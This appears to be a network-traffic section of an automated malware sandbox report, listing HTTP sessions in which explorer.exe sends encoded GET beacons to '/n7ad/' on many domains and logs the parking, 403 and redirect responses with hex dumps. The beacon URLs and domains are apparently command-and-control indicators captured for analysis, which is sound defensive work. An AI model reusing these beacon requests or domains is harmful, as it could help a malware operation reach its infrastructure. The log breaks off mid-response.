May 3, 2021 16:51:02.166860104 CEST	1664	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Mon, 03 May 2021 14:51:02 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc
May 3, 2021 16:51:02.166877985 CEST	1664	IN	Data Raw: 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ation.host + '/' + 'IONOSParkingUS' + '/park.js">' + '<\/script>' ); </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49737	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:12.309696913 CEST	1732	OUT	GET /n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al HTTP/1.1 Host: www.letsratethis.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:12.447180033 CEST	1732	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:12 GMT Content-Type: text/html Content-Length: 275 ETag: "6089cf31-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49755	74.208.236.36	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:52:26.091522932 CEST	9275	OUT	GET /n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al HTTP/1.1 Host: www.sloanksmith.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:52:26.259051085 CEST	9276	IN	HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 1364 Connection: close Date: Mon, 03 May 2021 14:52:26 GMT Server: Apache X-Frame-Options: deny Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 73 72 63 3d 22 2f 2f 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 66 72 6d 70 61 72 6b 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc
May 3, 2021 16:52:26.259092093 CEST	9276	IN	Data Raw: 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 53 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ation.host + '/' + 'IONOSParkingUS' + '/park.js">' + '<\/script>' ); </script> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49738	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:17.587124109 CEST	1772	OUT	GET /n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al HTTP/1.1 Host: www.cannabisllp.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:17.729289055 CEST	1772	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:17 GMT Content-Type: text/html Content-Length: 275 ETag: "6089be8c-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49745	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:28.055273056 CEST	8416	OUT	GET /n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al HTTP/1.1 Host: www.buffalobooze.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:28.192008018 CEST	8417	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:28 GMT Content-Type: text/html Content-Length: 275 ETag: "608f64c6-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49746	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:33.349997997 CEST	9240	OUT	GET /n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al HTTP/1.1 Host: www.checkmytradesmanswork.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:33.487457991 CEST	9241	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:33 GMT Content-Type: text/html Content-Length: 275 ETag: "608f64c6-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49747	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:38.629651070 CEST	9241	OUT	GET /n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al HTTP/1.1 Host: www.inthebeginningshop.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:38.766555071 CEST	9242	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 03 May 2021 14:51:38 GMT Content-Type: text/html Content-Length: 275 ETag: "6089cf31-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49748	81.17.18.196	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:49.181248903 CEST	9243	OUT	GET /n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al HTTP/1.1 Host: www.madisonroselove.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:49.240447044 CEST	9243	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Mon, 03 May 2021 14:51:48 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=16d8f1b6-ac1f-11eb-818f-5fcb3c45551e; path=/; domain=.madisonroselove.com; expires=Sat, 21 May 2089 18:05:56 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49751	206.189.50.215	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:51:59.515070915 CEST	9261	OUT	GET /n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al HTTP/1.1 Host: www.pedroiniesta.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:51:59.569699049 CEST	9261	IN	HTTP/1.1 301 Moved Permanently cache-control: public, max-age=0, must-revalidate content-length: 50 content-type: text/plain date: Mon, 03 May 2021 14:34:00 GMT x-language: location: https://www.pedroiniesta.net/n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al age: 1079 x-nf-request-id: 71acf9cf-c105-4833-8ef8-2fc039e0c77a server: Netlify x-country: CH Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 64 72 6f 69 6e 69 65 73 74 61 2e 6e 65 74 2f 6e 37 61 64 2f 0a Data Ascii: Redirecting to https://www.pedroiniesta.net/n7ad/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49752	192.185.131.134	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 16:52:04.990890026 CEST	9262	OUT	GET /n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al HTTP/1.1 Host: www.freecleanlimpieza.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 16:52:05.163970947 CEST	9263	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 03 May 2021 14:52:05 GMT Server: Apache Location: https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al Content-Length: 333 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 72 65 65 63 6c 65 61 6e 6c 69 6d 70 69 65 7a 61 2e 63 6f 6d 2f 6e 37 61 64 2f 3f 62 6c 3d 6d 32 48 61 73 66 77 4b 4a 71 4f 6e 69 76 6a 33 33 55 73 75 7a 63 64 69 47 53 66 39 35 68 2f 37 31 52 48 32 31 